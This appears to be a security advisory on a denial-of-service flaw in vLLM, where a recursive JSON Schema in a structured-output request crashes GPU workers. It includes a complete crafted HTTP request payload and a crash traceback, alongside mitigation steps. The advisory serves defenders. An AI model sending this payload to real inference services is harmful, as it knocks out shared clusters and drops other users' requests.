A high-severity denial-of-service vulnerability in vLLM EngineCore allows unauthenticated remote API clients to crash distributed GPU inference workers. Documented in GHSA-85xf-c7hm-whqw with a CVSS v3.1 score of 7.8, the flaw arises from improper recursion boundaries during guided decoding finite state machine (FSM) compilation. By submitting a crafted JSON Schema request, an attacker can trigger an unhandled exception inside the tensor-parallel CUDA execution thread, terminating the entire multi-tenant inference cluster.
The Architecture of Guided Decoding in High-Throughput Inference
vLLM is the leading open-source engine for serving large language models at scale, powering high-throughput enterprise deployments through PagedAttention and continuous request batching. To support structured outputs—such as JSON responses, Pydantic objects, and function-calling schemas—vLLM integrates guided decoding backends (such as Outlines or xgrammar).
When an API request specifies a response_format with a JSON schema, the inference engine converts the schema into a regular expression, which is compiled into a deterministic finite automaton (DFA) or pushdown automaton (PDA). At each autoregressive token generation step, the engine masks all logits corresponding to vocabulary tokens that would violate the schema syntax.
Vulnerability Mechanics: Recursion Exhaustion in FSM Compilation
The vulnerability exists in the schema preprocessing phase within vllm/model_executor/guided_decoding/. When building the state machine for complex recursive schemas—such as self-referential tree nodes or deeply nested $ref pointers—the compiler executes an unbounded depth-first search (DFS):
# Malicious Payload: Circularly Nested JSON Schema Request
POST /v1/chat/completions HTTP/1.1
Host: vllm-inference.corp.internal
Content-Type: application/json
{
"model": "meta-llama/Llama-3.3-70B-Instruct",
"messages": [{"role": "user", "content": "Generate a test tree"}],
"response_format": {
"type": "json_object",
"schema": {
"$defs": {
"Node": {
"type": "object",
"properties": {
"val": {"type": "integer"},
"left": {"$ref": "#/$defs/Node"},
"right": {"$ref": "#/$defs/Node"}
}
}
},
"allOf": [{"$ref": "#/$defs/Node"}]
}
}
}
When the vLLM EngineCore scheduler parses the nested $defs, the recursion depth exceeds the Python runtime limit or triggers an out-of-memory condition during regex compilation. Because the compilation occurs synchronously on the Ray worker node executing the model's pipeline-parallel forward pass, the unhandled exception terminates the Python process:
# Worker Crash Traceback
[Rank 0] Fatal error in GuidedDecodingLogitsProcessor:
RecursionError: maximum recursion depth exceeded while compiling regex pattern
[Rank 0] Process Process-1: Traceback (most recent call last):
RuntimeError: NCCL communicator failed: connection closed by peer.
Aborted (core dumped)
Blast Radius: Cascading Cluster Outages
In modern production inference clusters, models like Llama 3 70B are partitioned across 4 or 8 GPUs using NVIDIA NCCL for inter-GPU communication. When a single worker process crashes due to the malformed schema:
- The NCCL communication ring breaks, triggering an irrecoverable
SIGABRTacross all sibling GPU workers. - All in-flight requests in the batch—potentially serving dozens of unrelated enterprise users—are immediately dropped.
- The Kubernetes pod fails its liveness check and restarts, incurring a 5 to 15-minute service outage while weights are re-loaded into GPU High Bandwidth Memory (HBM).
Mitigation Actions & Deployment Patch
- Upgrade vLLM: Immediately update vLLM to release v0.6.3 or later, which introduces schema complexity validation and hard caps on regex recursion depth.
- Deploy API Gateway Schema Pre-Validation: Configure reverse proxies (e.g., Envoy or Cloudflare) to validate client JSON schemas before passing requests to inference backends. Reject schemas exceeding 8 levels of nesting:
# Nginx / Lua Pre-Validation Snippet local cjson = require("cjson.safe") local function check_schema_depth(tbl, depth) if depth > 8 then return false end for k, v in pairs(tbl) do if type(v) == "table" and not check_schema_depth(v, depth + 1) then return false end end return true end - Process Isolation: Configure vLLM with the
--guided-decoding-backend outlinesflag using worker isolation modes that prevent compilation failures from aborting the main PyTorch CUDA execution thread.



